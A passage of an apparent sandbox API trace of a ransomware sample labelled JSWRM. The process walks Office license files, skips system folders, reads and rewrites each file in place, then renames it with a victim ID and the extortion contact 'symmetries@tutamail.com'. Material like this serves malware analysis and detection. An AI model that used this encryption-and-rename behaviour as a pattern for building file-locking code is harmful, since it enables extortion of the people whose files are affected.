lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0105.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0105.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0105.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dff8 [0105.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0105.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dff8 | out: hHeap=0x1e0000) returned 1 [0105.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0105.778] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription3-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription3-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription3-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription3-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0105.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0105.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0105.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.779] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe71ee503, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe71ee503, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe736bc4d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d97, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremR_Subscription3-ul-oob.xrm-ms", cAlternateFileName="O3B707~1.XRM")) returned 1 [0105.779] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription3-ul-oob.xrm-ms", lpString2=".") returned 1 [0105.779] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription3-ul-oob.xrm-ms", lpString2="..") returned 1 [0105.779] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription3-ul-oob.xrm-ms", lpString2="...") returned 1 [0105.779] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription3-ul-oob.xrm-ms", lpString2="windows") returned -1 [0105.779] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription3-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0105.779] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription3-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0105.779] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription3-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0105.779] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription3-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.779] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription3-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0105.779] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription3-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0105.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0105.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription3-ul-oob.xrm-ms", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0105.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription3-ul-oob.xrm-ms", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Subscription3-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 45 [0105.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0105.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0105.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription3-ul-oob.xrm-ms", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0105.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription3-ul-oob.xrm-ms", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Subscription3-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 45 [0105.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0105.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0105.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0105.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0105.780] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription3-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription3-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.780] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11671) returned 1 [0105.780] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d90) returned 0x24c1d0 [0105.781] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d90, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d90, lpOverlapped=0x0) returned 1 [0105.788] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.788] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d90, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d90, lpOverlapped=0x0) returned 1 [0105.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.788] CloseHandle (hObject=0x45c) returned 1 [0105.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b8f8 [0105.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0105.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0105.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0105.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0105.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0105.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.789] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription3-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription3-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription3-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription3-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0105.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0105.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0105.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.790] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe721477b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe721477b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7391ec8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bcf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremR_Subscription4-pl.xrm-ms", cAlternateFileName="O35583~1.XRM")) returned 1 [0105.790] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription4-pl.xrm-ms", lpString2=".") returned 1 [0105.790] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription4-pl.xrm-ms", lpString2="..") returned 1 [0105.790] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription4-pl.xrm-ms", lpString2="...") returned 1 [0105.790] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription4-pl.xrm-ms", lpString2="windows") returned -1 [0105.790] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription4-pl.xrm-ms", lpString2="recovery") returned -1 [0105.790] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription4-pl.xrm-ms", lpString2="perflogs") returned -1 [0105.790] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription4-pl.xrm-ms", lpString2="documents and settings") returned 1 [0105.790] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription4-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.790] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription4-pl.xrm-ms", lpString2="system volume information") returned -1 [0105.790] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription4-pl.xrm-ms", lpString2="msocache") returned 1 [0105.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0105.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription4-pl.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0105.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription4-pl.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22d260, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Subscription4-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0105.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0105.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0105.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription4-pl.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0105.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0105.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription4-pl.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22d298, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Subscription4-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0105.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0105.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0105.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0105.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0105.791] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription4-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription4-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.791] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11215) returned 1 [0105.791] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bc0) returned 0x24c1d0 [0105.791] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bc0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bc0, lpOverlapped=0x0) returned 1 [0105.793] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.793] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bc0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bc0, lpOverlapped=0x0) returned 1 [0105.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.794] CloseHandle (hObject=0x45c) returned 1 [0105.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0105.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0105.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0105.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0105.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0105.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0105.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.794] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription4-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription4-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription4-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription4-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0105.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0105.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0105.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0105.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.795] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7155b4d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7155b4d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7286ef1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6c57, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremR_Subscription4-ppd.xrm-ms", cAlternateFileName="O397C9~1.XRM")) returned 1 [0105.795] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription4-ppd.xrm-ms", lpString2=".") returned 1 [0105.795] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription4-ppd.xrm-ms", lpString2="..") returned 1 [0105.795] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription4-ppd.xrm-ms", lpString2="...") returned 1 [0105.795] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription4-ppd.xrm-ms", lpString2="windows") returned -1 [0105.795] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription4-ppd.xrm-ms", lpString2="recovery") returned -1 [0105.795] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription4-ppd.xrm-ms", lpString2="perflogs") returned -1 [0105.795] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription4-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0105.795] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription4-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.795] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription4-ppd.xrm-ms", lpString2="system volume information") returned -1 [0105.795] lstrcmpiW (lpString1="O365SmallBusPremR_Subscription4-ppd.xrm-ms", lpString2="msocache") returned 1 [0105.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0105.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription4-ppd.xrm-ms", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0105.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription4-ppd.xrm-ms", cchWideChar=42, lpMultiByteStr=0x22cdc8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Subscription4-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 42 [0105.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0105.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0105.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription4-ppd.xrm-ms", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0105.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_Subscription4-ppd.xrm-ms", cchWideChar=42, lpMultiByteStr=0x22ce70, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_Subscription4-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 42 [0105.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0105.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0105.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0105.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0105.796] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription4-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription4-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.796] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=27735) returned 1 [0105.796] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.796] RtlAllocateHeap 